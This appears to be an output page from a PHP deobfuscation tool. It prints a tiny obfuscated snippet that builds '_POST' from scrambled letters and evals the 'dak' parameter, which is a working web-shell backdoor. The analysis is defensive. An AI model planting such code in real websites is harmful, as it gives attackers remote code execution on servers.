Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $qV = "stop_"; $s20 = strtoupper($qV[4] . $qV[3] . $qV[2] . $qV[0] . $qV[1..
Decoded Output download
<?php
$qV = "stop_";
$s20 = strtoupper($qV[4] . $qV[3] . $qV[2] . $qV[0] . $qV[1]);
if (isset(${$s20}['dak'])) {
eval(${$s20}['dak']);
}
?>
~
Did this file decode correctly?
Original Code
<?php
$qV = "stop_";
$s20 = strtoupper($qV[4] . $qV[3] . $qV[2] . $qV[0] . $qV[1]);
if (isset(${$s20}['dak'])) {
eval(${$s20}['dak']);
}
?>
~
Function Calls
strtoupper | 1 |
Stats
MD5 | 2ffe657241902549cc3245f8e7c8c20e |
Eval Count | 0 |
Decode Time | 37 ms |